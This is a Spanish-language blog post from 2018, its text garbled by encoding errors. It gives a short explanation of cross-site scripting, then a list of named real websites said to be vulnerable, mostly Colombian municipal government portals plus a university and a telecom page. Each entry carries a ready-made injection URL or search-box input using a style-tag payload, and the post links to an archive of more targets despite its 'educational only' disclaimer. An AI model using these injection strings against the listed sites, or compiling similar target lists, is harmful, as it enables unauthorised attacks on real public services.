mi茅rcoles, 17 de enero de 2018

Lista de paginas vulnerables a Cross-site scripting | XSS 馃弳

 Que es Cross site scripting?


XSS es un ataque de inyecci贸n de c贸digo malicioso para su posterior ejecuci贸n que puede realizarse a sitios web, aplicaciones locales e incluso al propio navegador.
Regularmente la mejor manera de llevar a acabo un ataque xss es haci茅ndose desde un formulario que no tiene filtros o verificaci贸n de contenido, a esto me refiero a que cuando un programador crea una pagina web, en muchos casos cuando pone un formulario, no utiliza filtros o alg煤n sistema que no permita que los caracteres o el texto que el usuario env铆a por el formulario  interact煤e con el c贸digo de la pagina, cuando el contenido del formulario se almacena directamente en una base de datos, esto hace que un ataque xss sea aun mas peligroso, ya que puede afectar permanentemente la estructura o el comportamiento de una pagina web hasta que el programador borre esta informaci贸n de la base de datos, esto sucede gracias a que si se almacenamos c贸digo html, css, javascript...  en una base de datos, si se saca esta informaci贸n a la vista del usuario, el navegador interpreta el contenido, como c贸digo fuente, mas no como texto.

NO ME HAGO RESPONSABLE DEL MAL USO DE ESTE CONTENIDO, EL OBJETIVO DE ESTE POST ES 脷NICAMENTE EDUCATIVO.


LISTADO DE PAGINAS WEB     VULNERABLES 



http://www.aguadas-caldas.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://www.pacora-caldas.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://inza-cauca.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://www.tabio-cundinamarca.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://umanizales.edu.co/  ----------> ingresar <style>*{background:red}</style> en el campo de busqueda de la esquina superior derecha

 http://app.claro.com.co/general/AnswerSMS.aspx?scc=15%27&msj=<style>*{background:red}</style>


PUEDES ENCONTRAR MAS PAGINAS SIMILARES EN EL SIGUIENTE LINK: http://xssed.com/archive


Lista de paginas que tienen el error o son vulnerables a xss o cross site scripting
Paginas vulnerables a cross site scripting xss




1 comentario: